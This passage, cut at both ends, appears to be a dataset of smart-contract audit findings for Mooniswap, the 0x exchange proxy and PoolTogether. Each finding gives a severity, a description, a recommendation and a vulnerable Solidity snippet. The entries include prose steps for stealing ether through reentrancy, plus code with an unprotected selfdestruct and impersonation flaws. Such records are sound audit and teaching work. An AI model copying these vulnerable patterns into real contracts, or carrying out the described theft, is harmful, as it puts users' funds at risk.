amount : 0)\\n .sub(to == address(0) ? amount : 0);\\n\\n ParamsHelper memory params = ParamsHelper({\\n from: from,\\n to: to,\\n amount: amount,\\n balanceFrom: balanceFrom,\\n balanceTo: balanceTo,\\n newTotalSupply: newTotalSupply\\n });\\n```\\n\\nnow, `balanceTo` is zero which would adjust voting power to `amount` instead of the user's actual balance + the newly minted token.\\n```\\nif (params.to != address(0)) {\\n votingData.updateBalance(params.to, voteTo, params.balanceTo, params.balanceTo.add(params.amount), params.newTotalSupply, defaultValue, emitEvent);\\n}\\n```\\nч`balanceTo` should be zero when burning (to == address(0)) and `balanceOf(to)` when minting.\\ne.g. like this:\\n```\\nuint256 balanceTo = (to != address(0)) ? balanceOf(to) : 0;\\n```\\nчч```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal override {\\n uint256 balanceFrom = (from != address(0)) ? balanceOf(from) : 0;\\n uint256 balanceTo = (from != address(0)) ? balanceOf(to) : 0;\\n uint256 newTotalSupply = totalSupply()\\n .add(from == address(0) ? amount : 0)\\n .sub(to == address(0) ? amount : 0);\\n\\n ParamsHelper memory params = ParamsHelper({\\n from: from,\\n to: to,\\n amount: amount,\\n balanceFrom: balanceFrom,\\n balanceTo: balanceTo,\\n newTotalSupply: newTotalSupply\\n });\\n```\\n -MooniswapGovernance - _beforeTokenTransfer should not update voting power on transfers to self UnverifiedчmediumчMooniswap governance is based on the liquidity voting system that is also employed by the mothership or for factory governance. In contrast to traditional voting systems where users vote for discrete values, the liquidity voting system derives a continuous weighted averaged “consensus” value from all the votes. 
Thus it is required that whenever stake changes in the system, all the parameters that can be voted upon are updated with the new weights for a specific user.\\nThe Mooniswap pool is governed by liquidity providers and liquidity tokens are the stake that gives voting rights in `MooniswapGovernance`. Thus whenever liquidity tokens are transferred to another address, stake and voting values need to be updated. This is handled by `MooniswapGovernance._beforeTokenTransfer()`.\\nIn the special case where someone triggers a token transfer where the `from` address equals the `to` address, effectively sending the token `to` themselves, no update on voting power should be performed. Instead, voting power is first updated with `balance - amount` and then with `balance + amount` which in the worst case means it is updating first `to` a zero balance and then `to` 2x the balance.\\nUltimately this should not have an effect on the overall outcome but is unnecessary and wasting gas.\\n`beforeTokenTransfer` callback in `Mooniswap` does not check for the NOP case where `from==to`\\n```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal override {\\n uint256 balanceFrom = (from != address(0)) ? balanceOf(from) : 0;\\n uint256 balanceTo = (from != address(0)) ? balanceOf(to) : 0;\\n uint256 newTotalSupply = totalSupply()\\n .add(from == address(0) ? amount : 0)\\n .sub(to == address(0) ? 
amount : 0);\\n\\n ParamsHelper memory params = ParamsHelper({\\n from: from,\\n to: to,\\n amount: amount,\\n balanceFrom: balanceFrom,\\n balanceTo: balanceTo,\\n newTotalSupply: newTotalSupply\\n });\\n\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultFee, \\_emitFeeVoteUpdate, \\_fee);\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultSlippageFee, \\_emitSlippageFeeVoteUpdate, \\_slippageFee);\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultDecayPeriod, \\_emitDecayPeriodVoteUpdate, \\_decayPeriod);\\n}\\n```\\n\\nwhich leads to `updateBalance` being called on the same address twice, first with `currentBalance - amountTransferred` and then with `currentBalance + amountTransferred`.\\n```\\nif (params.from != address(0)) {\\n votingData.updateBalance(params.from, voteFrom, params.balanceFrom, params.balanceFrom.sub(params.amount), params.newTotalSupply, defaultValue, emitEvent);\\n}\\n\\nif (params.to != address(0)) {\\n votingData.updateBalance(params.to, voteTo, params.balanceTo, params.balanceTo.add(params.amount), params.newTotalSupply, defaultValue, emitEvent);\\n}\\n```\\nчDo not update voting power on LP token transfers where `from == to`.чч```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal override {\\n uint256 balanceFrom = (from != address(0)) ? balanceOf(from) : 0;\\n uint256 balanceTo = (from != address(0)) ? balanceOf(to) : 0;\\n uint256 newTotalSupply = totalSupply()\\n .add(from == address(0) ? amount : 0)\\n .sub(to == address(0) ? 
amount : 0);\\n\\n ParamsHelper memory params = ParamsHelper({\\n from: from,\\n to: to,\\n amount: amount,\\n balanceFrom: balanceFrom,\\n balanceTo: balanceTo,\\n newTotalSupply: newTotalSupply\\n });\\n\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultFee, \\_emitFeeVoteUpdate, \\_fee);\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultSlippageFee, \\_emitSlippageFeeVoteUpdate, \\_slippageFee);\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultDecayPeriod, \\_emitDecayPeriodVoteUpdate, \\_decayPeriod);\\n}\\n```\\n -Unpredictable behavior for users due to admin front running or general bad timingчmediumчIn a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to the unfortunate timing of changes.\\nIn general users of the system should have assurances about the behavior of the action they're about to take.\\nMooniswapFactoryGovernance - Admin opportunity to lock `swapFor` with a referral when setting an invalid `referralFeeReceiver`\\n`setReferralFeeReceiver` and `setGovernanceFeeReceiver` takes effect immediately.\\n```\\nfunction setReferralFeeReceiver(address newReferralFeeReceiver) external onlyOwner {\\n referralFeeReceiver = newReferralFeeReceiver;\\n emit ReferralFeeReceiverUpdate(newReferralFeeReceiver);\\n}\\n```\\n\\n`setReferralFeeReceiver` can be used to set an invalid receiver address (or one that reverts on every call) effectively rendering `Mooniswap.swapFor` unusable if a referral was specified in the swap.\\n```\\nif (referral != address(0)) {\\n referralShare = invIncrease.mul(referralShare).div(\\_FEE\\_DENOMINATOR);\\n if (referralShare > 0) {\\n if (referralFeeReceiver != address(0)) {\\n 
\_mint(referralFeeReceiver, referralShare);\n IReferralFeeReceiver(referralFeeReceiver).updateReward(referral, referralShare);\n```\n\nLocking staked token\nAt any point in time and without prior notice to users an admin may accidentally or intentionally add a broken governance sub-module to the system that blocks all users from unstaking their `1INCH` token. An admin can recover from this by removing the broken sub-module, however, with malicious intent tokens may be locked forever.\nSince `1INCH` token gives voting power in the system, tokens are considered to hold value for other users and may be traded on exchanges. This raises concerns if tokens can be locked in a contract by one actor.\nAn admin adds an invalid address or a malicious sub-module to the governance contract that always `reverts` on calls to `notifyStakeChanged`.\n```\nfunction addModule(address module) external onlyOwner {\n require(\_modules.add(module), "Module already registered");\n emit AddModule(module);\n}\n```\n\n```\nfunction \_notifyFor(address account, uint256 balance) private {\n uint256 modulesLength = \_modules.length();\n for (uint256 i = 0; i < modulesLength; ++i) {\n IGovernanceModule(\_modules.at(i)).notifyStakeChanged(account, balance);\n }\n}\n```\n\nAdmin front-running to prevent user stake sync\nAn admin may front-run users while staking in an attempt to prevent submodules from being notified of the stake update. This is unlikely to happen as it incurs costs for the attacker (front-back-running) to normal users but may be an interesting attack scenario to exclude a whale's stake from voting.\nFor example, an admin may front-run `stake()` or `notify*()` by briefly removing all governance submodules from the mothership and re-adding them after the user's call succeeded. The stake-update will not be propagated to the sub-modules.
A user may only detect this when they are voting (if they had no stake before) or when they actually check their stake. Such an attack might likely stay unnoticed unless someone listens for `addmodule` `removemodule` events on the contract.\\nAn admin front-runs a transaction by removing all modules and re-adding them afterwards to prevent the stake from propagating to the submodules.\\n```\\nfunction removeModule(address module) external onlyOwner {\\n require(\\_modules.remove(module), \"Module was not registered\");\\n emit RemoveModule(module);\\n}\\n```\\n\\nAdmin front-running to prevent unstake from propagating\\nAn admin may choose to front-run their own `unstake()`, temporarily removing all governance sub-modules, preventing `unstake()` from syncing the action to sub-modules while still getting their previously staked tokens out. The governance sub-modules can be re-added right after unstaking. Due to double-accounting of the stake (in governance and in every sub-module) their stake will still be exercisable in the sub-module even though it was removed from the mothership. Users can only prevent this by manually calling a state-sync on the affected account(s).чThe underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all system-parameter and upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period. This allows users that do not accept the change to withdraw immediately.\\nFurthermore, users should be guaranteed to be able to redeem their staked tokens. 
An entity - even though trusted - in the system should not be able to lock tokens indefinitely.чч```\\nfunction setReferralFeeReceiver(address newReferralFeeReceiver) external onlyOwner {\\n referralFeeReceiver = newReferralFeeReceiver;\\n emit ReferralFeeReceiverUpdate(newReferralFeeReceiver);\\n}\\n```\\n -The owner can borrow token0/token1 in the rescueFundsчlowчIf some random tokens/funds are accidentally transferred to the pool, the `owner` can call the `rescueFunds` function to withdraw any funds manually:\\n```\\nfunction rescueFunds(IERC20 token, uint256 amount) external nonReentrant onlyOwner {\\n uint256 balance0 = token0.uniBalanceOf(address(this));\\n uint256 balance1 = token1.uniBalanceOf(address(this));\\n\\n token.uniTransfer(msg.sender, amount);\\n\\n require(token0.uniBalanceOf(address(this)) >= balance0, \"Mooniswap: access denied\");\\n require(token1.uniBalanceOf(address(this)) >= balance1, \"Mooniswap: access denied\");\\n require(balanceOf(address(this)) >= \\_BASE\\_SUPPLY, \"Mooniswap: access denied\");\\n}\\n```\\n\\nThere's no restriction on which funds the `owner` can try to withdraw and which token to call. It's theoretically possible to transfer pool tokens and then return them to the contract (e.g. in the case of ERC-777). 
That action would be similar to a free flash loan.чExplicitly check that the `token` is not equal to any of the pool tokens.чч```\\nfunction rescueFunds(IERC20 token, uint256 amount) external nonReentrant onlyOwner {\\n uint256 balance0 = token0.uniBalanceOf(address(this));\\n uint256 balance1 = token1.uniBalanceOf(address(this));\\n\\n token.uniTransfer(msg.sender, amount);\\n\\n require(token0.uniBalanceOf(address(this)) >= balance0, \"Mooniswap: access denied\");\\n require(token1.uniBalanceOf(address(this)) >= balance1, \"Mooniswap: access denied\");\\n require(balanceOf(address(this)) >= \\_BASE\\_SUPPLY, \"Mooniswap: access denied\");\\n}\\n```\\n -Ether temporarily held during transactions can be stolen via reentrancyчhighчThe exchange proxy typically holds no ether balance, but it can temporarily hold a balance during a transaction. This balance is vulnerable to theft if the following conditions are met:\\nNo check at the end of the transaction reverts if ether goes missing,\\nreentrancy is possible during the transaction, and\\na mechanism exists to spend ether held by the exchange proxy.\\nWe found one example where these conditions are met, but it's possible that more exist.\\nExample\\n`MetaTransactionsFeature.executeMetaTransaction()` accepts ether, which is used to pay protocol fees. It's possible for less than the full amount in `msg.value` to be consumed, which is why the function uses the `refundsAttachedEth` modifier to return any remaining ether to the caller:\\n```\\n/// @dev Refunds up to `msg.value` leftover ETH at the end of the call.\\nmodifier refundsAttachedEth() {\\n \\_;\\n uint256 remainingBalance =\\n LibSafeMathV06.min256(msg.value, address(this).balance);\\n if (remainingBalance > 0) {\\n msg.sender.transfer(remainingBalance);\\n }\\n}\\n```\\n\\nNotice that this modifier just returns the remaining ether balance (up to msg.value). It does not check for a specific amount of remaining ether. 
This meets condition (1) above.\\nIt's impossible to reenter the system with a second metatransaction because `executeMetaTransaction()` uses the modifier `nonReentrant`, but there's nothing preventing reentrancy via a different feature. We can achieve reentrancy by trading a token that uses callbacks (e.g. ERC777's hooks) during transfers. This meets condition (2).\\nTo find a full exploit, we also need a way to extract the ether held by the exchange proxy. `LiquidityProviderFeature.sellToLiquidityProvider()` provides such a mechanism. By passing `ETH_TOKEN_ADDRESS` as the `inputToken` and an address in the attacker's control as the `provider`, an attacker can transfer out any ether held by the exchange proxy. Note that `sellToLiquidityProvider()` can transfer any amount of ether, not limited to the amount sent via msg.value:\\n```\\nif (inputToken == ETH\\_TOKEN\\_ADDRESS) {\\n provider.transfer(sellAmount);\\n```\\n\\nThis meets condition (3).\\nThe full steps to exploit this vulnerability are as follows:\\nA maker/attacker signs a trade where one of the tokens will invoke a callback during the trade.\\nA taker signs a metatransaction to take this trade.\\nA relayer sends in the metatransaction, providing more ether than is necessary to pay the protocol fee. (It's unclear how likely this situation is.)\\nDuring the token callback, the attacker invokes `LiquidityProviderFeature.sellToLiquidityProvider()` to transfer the excess ether to their account.\\nThe metatransaction feature returns the remaining ether balance, which is now zero.чIn general, we recommend using strict accounting of ether throughout the system. If there's ever a temporary balance, it should be accurately resolved at the end of the transaction, after any potential reentrancy opportunities.\\nFor the example we specifically found, we recommend doing strict accounting in the metatransactions feature. 
This means features called via a metatransaction would need to return how much ether was consumed. The metatransactions feature could then refund exactly `msg.value` minus the amount of ether consumed. The transaction should be reverted if this fails because it means ether went missing during the transaction.\\nWe also recommend limiting `sellToLiquidityProvider()` to only transfer up to `msg.value`. This is a form of defense in depth in case other vectors for a similar attack exist.чч```\\n/// @dev Refunds up to `msg.value` leftover ETH at the end of the call.\\nmodifier refundsAttachedEth() {\\n \\_;\\n uint256 remainingBalance =\\n LibSafeMathV06.min256(msg.value, address(this).balance);\\n if (remainingBalance > 0) {\\n msg.sender.transfer(remainingBalance);\\n }\\n}\\n```\\n -UniswapFeature: Non-static call to ERC20.allowance()чlowчIn the case where a token is possibly “greedy” (consumes all gas on failure), `UniswapFeature` makes a call to the token's `allowance()` function to check whether the user has provided a token allowance to the protocol proxy or to the `AllowanceTarget`. This call is made using `call()`, potentially allowing state-changing operations to take place before control of the execution returns to `UniswapFeature`.\\n```\\n// `token.allowance()``\\nmstore(0xB00, ALLOWANCE\\_CALL\\_SELECTOR\\_32)\\nmstore(0xB04, caller())\\nmstore(0xB24, address())\\nlet success := call(gas(), token, 0, 0xB00, 0x44, 0xC00, 0x20)\\n```\\nчReplace the `call()` with a `staticcall()`.чч```\\n// `token.allowance()``\\nmstore(0xB00, ALLOWANCE\\_CALL\\_SELECTOR\\_32)\\nmstore(0xB04, caller())\\nmstore(0xB24, address())\\nlet success := call(gas(), token, 0, 0xB00, 0x44, 0xC00, 0x20)\\n```\\n -UniswapFeature: Unchecked returndatasize in low-level external callsчlowч`UniswapFeature` makes a number of external calls from low-level assembly code. Two of these calls rely on the `CALL` opcode to copy the returndata to memory without checking that the call returned the expected amount of data.
Because the `CALL` opcode does not zero memory if the call returns less data than expected, this can lead to usage of dirty memory under the assumption that it is data returned from the most recent call.\\nCall to `UniswapV2Pair.getReserves()`\\n```\\n// Call pair.getReserves(), store the results at `0xC00`\\nmstore(0xB00, UNISWAP\\_PAIR\\_RESERVES\\_CALL\\_SELECTOR\\_32)\\nif iszero(staticcall(gas(), pair, 0xB00, 0x4, 0xC00, 0x40)) {\\n bubbleRevert()\\n}\\n```\\n\\nCall to `ERC20.allowance()`\\n```\\n// Check if we have enough direct allowance by calling\\n// `token.allowance()``\\nmstore(0xB00, ALLOWANCE\\_CALL\\_SELECTOR\\_32)\\nmstore(0xB04, caller())\\nmstore(0xB24, address())\\nlet success := call(gas(), token, 0, 0xB00, 0x44, 0xC00, 0x20)\\n```\\nчInstead of providing a memory range for `call()` to write returndata to, explicitly check `returndatasize()` after the call is made and then copy the data into memory using `returndatacopy()`.\\n```\\nif lt(returndatasize(), EXPECTED\\_SIZE) {\\n revert(0, 0) \\n}\\nreturndatacopy(0xC00, 0x00, EXPECTED\\_SIZE)\\n```\\nчч```\\n// Call pair.getReserves(), store the results at `0xC00`\\nmstore(0xB00, UNISWAP\\_PAIR\\_RESERVES\\_CALL\\_SELECTOR\\_32)\\nif iszero(staticcall(gas(), pair, 0xB00, 0x4, 0xC00, 0x40)) {\\n bubbleRevert()\\n}\\n```\\n -PeriodicPrizeStrategy - RNG failure can lock user fundsчhighчTo prevent manipulation of the `SortitionSumTree` after a requested random number enters the mempool, users are unable to withdraw funds while the strategy contract waits on a random number request between execution of `startAward()` and `completeAward()`.\\nIf an rng request fails, however, there is no way to exit this locked state. After an rng request times out, only `startAward()` can be called, which will make another rng request and re-enter the same locked state. The rng provider can also not be updated while the contract is in this state. 
If the rng provider fails permanently, user funds are permanently locked.\\n`requireNotLocked()` prevents transfers, deposits, or withdrawals when there is a pending award.\\n```\\nfunction beforeTokenTransfer(address from, address to, uint256 amount, address controlledToken) external override onlyPrizePool {\\n if (controlledToken == address(ticket)) {\\n \\_requireNotLocked();\\n }\\n```\\n\\n```\\nfunction \\_requireNotLocked() internal view {\\n uint256 currentBlock = \\_currentBlock();\\n require(rngRequest.lockBlock == 0 || currentBlock < rngRequest.lockBlock, \"PeriodicPrizeStrategy/rng-in-flight\");\\n}\\n```\\n\\n`setRngService()` reverts if there is a pending or timed-out rng request\\n```\\nfunction setRngService(RNGInterface rngService) external onlyOwner {\\n require(!isRngRequested(), \"PeriodicPrizeStrategy/rng-in-flight\");\\n```\\nчInstead of forcing the pending award phase to be re-entered in the event of an rng request time-out, provide an `exitAwardPhase()` function that ends the award phase without paying out the award. This will at least allow users to withdraw their funds in the event of a catastrophic failure of the rng service. It may also be prudent to allow the rng service to be updated in the event of an rng request time out.чч```\\nfunction beforeTokenTransfer(address from, address to, uint256 amount, address controlledToken) external override onlyPrizePool {\\n if (controlledToken == address(ticket)) {\\n \\_requireNotLocked();\\n }\\n```\\n -LootBox - Unprotected selfdestruct in proxy implementationчhighчWhen the `LootBoxController` is deployed, it also deploys an instance of `LootBox`. 
When someone calls `LootBoxController.plunder()` or `LootBoxController.executeCall()` the controller actually deploys a temporary proxy contract to a deterministic address using `create2`, then calls out to it to collect the loot.\\nThe `LootBox` implementation contract is completely unprotected, exposing all its functionality to any actor on the blockchain. The most critical functionality is actually the `LootBox.destroy()` method that calls `selfdestruct()` on the implementation contract.\\nTherefore, an unauthenticated user can `selfdestruct` the `LootBox` proxy implementation and cause the complete system to become dysfunctional. As an effect, none of the AirDrops that were delivered based on this contract will be redeemable (Note: `create2` deploy address is calculated from the current contract address and salt). Funds may be lost.\\n```\\nconstructor () public {\\n lootBoxActionInstance = new LootBox();\\n lootBoxActionBytecode = MinimalProxyLibrary.minimalProxy(address(lootBoxActionInstance));\\n}\\n```\\n\\n```\\n/// @notice Destroys this contract using `selfdestruct`\\n/// @param to The address to send remaining Ether to\\nfunction destroy(address payable to) external {\\n selfdestruct(to);\\n}\\n```\\n\\nnot in scope but listed for completeness\\n```\\ncontract CounterfactualAction {\\n function depositTo(address payable user, PrizePool prizePool, address output, address referrer) external {\\n IERC20 token = IERC20(prizePool.token());\\n uint256 amount = token.balanceOf(address(this));\\n token.approve(address(prizePool), amount);\\n prizePool.depositTo(user, amount, output, referrer);\\n selfdestruct(user);\\n }\\n\\n function cancel(address payable user, PrizePool prizePool) external {\\n IERC20 token = IERC20(prizePool.token());\\n token.transfer(user, token.balanceOf(address(this)));\\n selfdestruct(user);\\n }\\n```\\nчEnforce that only the deployer of the contract can call functionality in the contract. 
Make sure that nobody can destroy the implementation of proxy contracts.чч```\\nconstructor () public {\\n lootBoxActionInstance = new LootBox();\\n lootBoxActionBytecode = MinimalProxyLibrary.minimalProxy(address(lootBoxActionInstance));\\n}\\n```\\n -PeriodicPriceStrategy - trustedForwarder can impersonate any msg.senderчhighчThe `trustedForwarder` undermines the trust assumptions in the system. For example, one would assume that the access control modifier `onlyPrizePool` would only allow the configured `PrizePool` to call certain methods. However, in reality, the `trustedForwarder` can assume this position as well. The same is true for the `onlyOwnerOrListener` modifier. One would assume `msg.sender` must either be `periodicPrizeStrategyListener` or `owner` (the initial deployer) while the `trustedForwarder` can assume any of the administrative roles.\\nThe centralization of power to allow one account to impersonate other components and roles (owner, `listener`, prizePool) in the system is a concern by itself and may give users pause when deciding whether to trust the contract system. The fact that the `trustedForwarder` can spoof events for any `msg.sender` may also make it hard to keep an accurate log trail of events in case of a security incident.\\nNote: The same functionality seems to be used in `ControlledToken` and other contracts which allows the `trustedForwarder` to assume any tokenholder in `ERC20UpgradeSafe`. 
There is practically no guarantee to `ControlledToken` holders.\\nNote: The trustedForwarder/msgSender() pattern is used in multiple contracts, many of which are not in the scope of this assessment.\\naccess control modifiers that can be impersonated\\n```\\nmodifier onlyPrizePool() {\\n require(\\_msgSender() == address(prizePool), \"PeriodicPrizeStrategy/only-prize-pool\");\\n \\_;\\n}\\n```\\n\\n```\\nmodifier onlyOwnerOrListener() {\\n require(\\_msgSender() == owner() || \\_msgSender() == address(periodicPrizeStrategyListener), \"PeriodicPrizeStrategy/only-owner-or-listener\");\\n \\_;\\n}\\n```\\n\\nevent `msg.sender` that can be spoofed because the actual `msg.sender` can be `trustedForwarder`\\n```\\nemit PrizePoolOpened(\\_msgSender(), prizePeriodStartedAt);\\n```\\n\\n```\\nemit PrizePoolAwardStarted(\\_msgSender(), address(prizePool), requestId, lockBlock);\\n```\\n\\n```\\nemit PrizePoolAwarded(\\_msgSender(), randomNumber);\\nemit PrizePoolOpened(\\_msgSender(), prizePeriodStartedAt);\\n```\\n\\n`_msgSender()` implementation allows the `trustedForwarder` to impersonate any `msg.sender` address\\n```\\n/// @dev Provides information about the current execution context for GSN Meta-Txs.\\n/// @return The payable address of the message sender\\nfunction \\_msgSender()\\n internal\\n override(BaseRelayRecipient, ContextUpgradeSafe)\\n virtual\\n view\\n returns (address payable)\\n{\\n return BaseRelayRecipient.\\_msgSender();\\n}\\n```\\nчRemove the `trustedForwarder` or restrict the type of actions the forwarder can perform and don't allow it to impersonate other components in the system. Make sure users understand the trust assumptions and who has what powers in the system. 
Make sure to keep an accurate log trail of who performed which action on whose behalf.чч```\\nmodifier onlyPrizePool() {\\n require(\\_msgSender() == address(prizePool), \"PeriodicPrizeStrategy/only-prize-pool\");\\n \\_;\\n}\\n```\\n -Unpredictable behavior for users due to admin front running or general bad timingчhighчIn a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to unfortunate timing of changes.\\nIn general users of the system should have assurances about the behavior of the action they're about to take.\\nAn administrator (deployer) of `MultipleWinners` can change the number of winners in the system without warning. This has the potential to violate a security goal of the system.\\nadmin can change the number of winners during a prize-draw period\\n```\\nfunction setNumberOfWinners(uint256 count) external onlyOwner {\\n \\_\\_numberOfWinners = count;\\n\\n emit NumberOfWinnersSet(count);\\n}\\n```\\n\\n`PeriodicPriceStrategy` - admin may switch-out RNG service at any time (when RNG is not in inflight or timed-out)\\n```\\nfunction setRngService(RNGInterface rngService) external onlyOwner {\\n require(!isRngRequested(), \"PeriodicPrizeStrategy/rng-in-flight\");\\n\\n rng = rngService;\\n emit RngServiceUpdated(address(rngService));\\n}\\n```\\n\\n`PeriodicPriceStrategy` - admin can effectively disable the rng request timeout by setting a high value during a prize-draw (e.g.
to indefinitely block payouts)\\n```\\nfunction setRngRequestTimeout(uint32 \\_rngRequestTimeout) external onlyOwner {\\n \\_setRngRequestTimeout(\\_rngRequestTimeout);\\n}\\n```\\n\\n`PeriodicPriceStrategy` - admin may set new tokenListener which might intentionally block token-transfers\\n```\\nfunction setTokenListener(TokenListenerInterface \\_tokenListener) external onlyOwner {\\n tokenListener = \\_tokenListener;\\n\\n emit TokenListenerUpdated(address(tokenListener));\\n}\\n```\\n\\n```\\nfunction setPeriodicPrizeStrategyListener(address \\_periodicPrizeStrategyListener) external onlyOwner {\\n periodicPrizeStrategyListener = PeriodicPrizeStrategyListener(\\_periodicPrizeStrategyListener);\\n\\n emit PeriodicPrizeStrategyListenerSet(\\_periodicPrizeStrategyListener);\\n}\\n```\\n\\nout of scope but mentioned as a relevant example: `PrizePool` owner can set new `PrizeStrategy` at any time\\n```\\n/// @notice Sets the prize strategy of the prize pool. Only callable by the owner.\\n/// @param \\_prizeStrategy The new prize strategy\\nfunction setPrizeStrategy(address \\_prizeStrategy) external override onlyOwner {\\n \\_setPrizeStrategy(TokenListenerInterface(\\_prizeStrategy));\\n}\\n```\\n\\na malicious admin may remove all external ERC20/ERC721 token awards prior to the user claiming them (admin front-running opportunity)\\n```\\nfunction removeExternalErc20Award(address \\_externalErc20, address \\_prevExternalErc20) external onlyOwner {\\n externalErc20s.removeAddress(\\_prevExternalErc20, \\_externalErc20);\\n emit ExternalErc20AwardRemoved(\\_externalErc20);\\n}\\n```\\n\\n```\\nfunction removeExternalErc721Award(address \\_externalErc721, address \\_prevExternalErc721) external onlyOwner {\\n externalErc721s.removeAddress(\\_prevExternalErc721, \\_externalErc721);\\n delete externalErc721TokenIds[\\_externalErc721];\\n emit ExternalErc721AwardRemoved(\\_externalErc721);\\n}\\n```\\n\\nthe `PeriodicPrizeStrategy` `owner` (also see concerns outlined in 
issue 5.4) can transfer external ERC20 at any time to avoid them being awarded to users. there is no guarantee to the user.\\n```\\nfunction transferExternalERC20(\\n address to,\\n address externalToken,\\n uint256 amount\\n)\\n external\\n onlyOwner\\n{\\n prizePool.transferExternalERC20(to, externalToken, amount);\\n}\\n```\\nчThe underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all system-parameter and upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period. This allows users that do not accept the change to withdraw immediately.чч```\\nfunction setNumberOfWinners(uint256 count) external onlyOwner {\\n \\_\\_numberOfWinners = count;\\n\\n emit NumberOfWinnersSet(count);\\n}\\n```\\n -PeriodicPriceStrategy - addExternalErc721Award duplicate or invalid tokenIds may block award phaseчmediumчThe prize-strategy owner (or a listener) can add `ERC721` token awards by calling `addExternalErc721Award` providing the `ERC721` token address and a list of `tokenIds` owned by the prizePool.\\nThe method does not check if duplicate `tokenIds` or `tokenIds` that are not owned by the contract are provided. 
This may cause an exception when `_awardExternalErc721s` calls `prizePool.awardExternalERC721` to transfer an invalid or previously transferred token, blocking the award phase.\\nNote: An admin can recover from this situation by removing and re-adding the `ERC721` token from the awards list.\\nadding `tokenIds`\\n```\\n/// @notice Adds an external ERC721 token as an additional prize that can be awarded\\n/// @dev Only the Prize-Strategy owner/creator can assign external tokens,\\n/// and they must be approved by the Prize-Pool\\n/// NOTE: The NFT must already be owned by the Prize-Pool\\n/// @param \\_externalErc721 The address of an ERC721 token to be awarded\\n/// @param \\_tokenIds An array of token IDs of the ERC721 to be awarded\\nfunction addExternalErc721Award(address \\_externalErc721, uint256[] calldata \\_tokenIds) external onlyOwnerOrListener {\\n // require(\\_externalErc721.isContract(), \"PeriodicPrizeStrategy/external-erc721-not-contract\");\\n require(prizePool.canAwardExternal(\\_externalErc721), \"PeriodicPrizeStrategy/cannot-award-external\");\\n \\n if (!externalErc721s.contains(\\_externalErc721)) {\\n externalErc721s.addAddress(\\_externalErc721);\\n }\\n\\n for (uint256 i = 0; i < \\_tokenIds.length; i++) {\\n uint256 tokenId = \\_tokenIds[i];\\n require(IERC721(\\_externalErc721).ownerOf(tokenId) == address(prizePool), \"PeriodicPrizeStrategy/unavailable-token\");\\n externalErc721TokenIds[\\_externalErc721].push(tokenId);\\n }\\n\\n emit ExternalErc721AwardAdded(\\_externalErc721, \\_tokenIds);\\n}\\n```\\n\\nawarding tokens\\n```\\n/// @notice Awards all external ERC721 tokens to the given user.\\n/// The external tokens must be held by the PrizePool contract.\\n/// @dev The list of ERC721s is reset after every award\\n/// @param winner The user to transfer the tokens to\\nfunction \\_awardExternalErc721s(address winner) internal {\\n address currentToken = externalErc721s.start();\\n while (currentToken != address(0) && currentToken != 
externalErc721s.end()) {\\n uint256 balance = IERC721(currentToken).balanceOf(address(prizePool));\\n if (balance > 0) {\\n prizePool.awardExternalERC721(winner, currentToken, externalErc721TokenIds[currentToken]);\\n delete externalErc721TokenIds[currentToken];\\n }\\n currentToken = externalErc721s.next(currentToken);\\n }\\n externalErc721s.clearAll();\\n}\\n```\\n\\ntransferring the tokens\\n```\\n/// @notice Called by the prize strategy to award external ERC721 prizes\\n/// @dev Used to award any arbitrary NFTs held by the Prize Pool\\n/// @param to The address of the winner that receives the award\\n/// @param externalToken The address of the external NFT token being awarded\\n/// @param tokenIds An array of NFT Token IDs to be transferred\\nfunction awardExternalERC721(\\n address to,\\n address externalToken,\\n uint256[] calldata tokenIds\\n)\\n external override\\n onlyPrizeStrategy\\n{\\n require(\\_canAwardExternal(externalToken), \"PrizePool/invalid-external-token\");\\n\\n if (tokenIds.length == 0) {\\n return;\\n }\\n\\n for (uint256 i = 0; i < tokenIds.length; i++) {\\n IERC721(externalToken).transferFrom(address(this), to, tokenIds[i]);\\n }\\n\\n emit AwardedExternalERC721(to, externalToken, tokenIds);\\n}\\n```\\nчEnsure that no duplicate token-ids were provided or skip over token-ids that are not owned by prize-pool (anymore).чч```\\n/// @notice Adds an external ERC721 token as an additional prize that can be awarded\\n/// @dev Only the Prize-Strategy owner/creator can assign external tokens,\\n/// and they must be approved by the Prize-Pool\\n/// NOTE: The NFT must already be owned by the Prize-Pool\\n/// @param \\_externalErc721 The address of an ERC721 token to be awarded\\n/// @param \\_tokenIds An array of token IDs of the ERC721 to be awarded\\nfunction addExternalErc721Award(address \\_externalErc721, uint256[] calldata \\_tokenIds) external onlyOwnerOrListener {\\n // require(\\_externalErc721.isContract(), 
